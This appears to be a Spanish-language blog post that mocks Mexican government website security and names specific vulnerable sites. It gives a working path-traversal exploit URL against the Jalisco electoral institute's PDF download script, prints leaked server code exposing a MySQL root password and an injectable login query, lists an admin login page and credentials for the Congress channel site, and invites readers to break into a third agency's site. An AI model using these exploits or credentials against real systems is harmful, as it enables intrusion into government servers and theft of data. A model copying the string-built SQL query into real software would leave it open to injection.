No es algo nuevo que las entidades gubernamentales se vean de repente frente a una nueva tendencia en la sociedad que los ha puesto «de cabeza» en varias ocasiones, pero que realmente no les interesa y eso es SEGURIDAD INFORMÁTICA.
Sabemos que el hecho no es fortuito ni casual. Varios han sido los casos en que muchos gobiernos han experimentado todo tipo de proliferaciones insinuantes o directas de malware, acciones de crackers, defaces apropiación indebida de contenido web, delitos informáticos, casi siempre en muchas de sus sitios oficiales, algunos recientes por ejemplo dof.gob.mx, conaculta.gob.mx, economia.gob.mx pero eso es historia vieja.
El gobierno nunca entenderá que debe de existir un organismo rector, que vigile el cumplimiento de estándares informáticos en las dependencias.
Instituto Electoral y de Participación Ciudadana del Estado de Jalisco (IEPC)
El portal del instituto electoral de Jalisco es totalmente vulnerable (http://www.iepcjalisco.org.mx) ya que ellos en una sección llamada «Folios» permiten descargar archivos en PDF, pero a los desarrolladores no se les ocurrió validar que SOLO archivos de tipo PDF sean lo que realmente se descargue y por tanto el sitio permite descargar cualquier archivo del servidor.
Exploit: www.iepcjalisco.org.mx/folios/downloadPDF.php?f=../../../../index.php
$link=mysql_connect(«localhost»,»root»,»intranetIEEJ»);
…
$sql=»SELECT * FROM intdocum WHERE user=’$username’ and password=’$password'»;
…
Canal del Congreso (canaldelcongreso.gob.mx)
Seré simple, claro y conciso «SQL Injection»:
http://www.canaldelcongreso.gob.mx/nueva_imagen/admin/login.php
Usuario y Contraseña:
cgpca_5285:658//.3726
Secretaría de Educación Pública (SEP)
Y el tercero se los dejo de «pilón» para que le busquen XD:
